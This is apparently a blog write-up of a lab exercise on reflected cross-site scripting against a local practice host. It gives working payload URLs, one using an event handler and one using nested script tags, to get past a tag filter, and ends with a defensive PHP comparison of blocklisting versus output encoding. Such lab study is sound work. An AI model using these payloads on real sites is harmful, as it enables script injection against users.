You notified the developer about your bypass. He added more filtering and now
seems to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...
Payload
http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E
This isn't the way the paper wants you to pop the XSS, but I had the payload correct and it wouldn't pop. The correct payload, which should have popped, was:
http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>
Which produced this:
If you know why this didn't work, feel free to comment!
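For comparison, here is an added example (not the exercise's source code and not the author's) that runs the two `name` values from this post through a tag-stripping blocklist and through output encoding. The blocklist is an assumption: a single case-insensitive pass that removes `<script>` and `</script>`. The function names are hypothetical.

```php
<?php
// Added example. ASSUMED filter: one case-insensitive pass that deletes
// the literal strings <script> and </script> from the parameter.
function blocklist_filter(string $name): string {
    $name = preg_replace('/<script>/i', '', $name);
    return preg_replace('/<\/script>/i', '', $name);
}

// Mitigation: encode for the HTML body context at output time instead of
// trying to enumerate dangerous tags.
function encode_for_html(string $name): string {
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The two name values from the post, URL-decoded.
$inputs = [
    'event handler' => "Bobby<p onmouseover=alert('Dazzl')>er</p>",
    'nested tags'   => "Annoying<<script<>script>alert('Dazzler')<</script<>/script>",
];

foreach ($inputs as $label => $raw) {
    $filtered = blocklist_filter($raw);
    $encoded  = encode_for_html($raw);

    printf("[%s]\n", $label);
    // Did the blocklist match anything in this value at all?
    printf("  blocklist changed input:  %s\n", $filtered === $raw ? 'no' : 'yes');
    // Is there still something that looks like a tag after filtering?
    printf("  markup left after filter: %s\n",
        preg_match('/<[a-z\/]/i', $filtered) ? 'yes' : 'no');
    // Encoded form that would be written into the page.
    printf("  encoded output:           %s\n", $encoded);
    printf("  raw '<' after encoding:   %s\n",
        strpos($encoded, '<') !== false ? 'yes' : 'no');
}
```

Under this assumed filter neither value contains the exact strings the patterns look for, so both come out unchanged, while the encoded form contains no raw `<` for the browser to parse as markup.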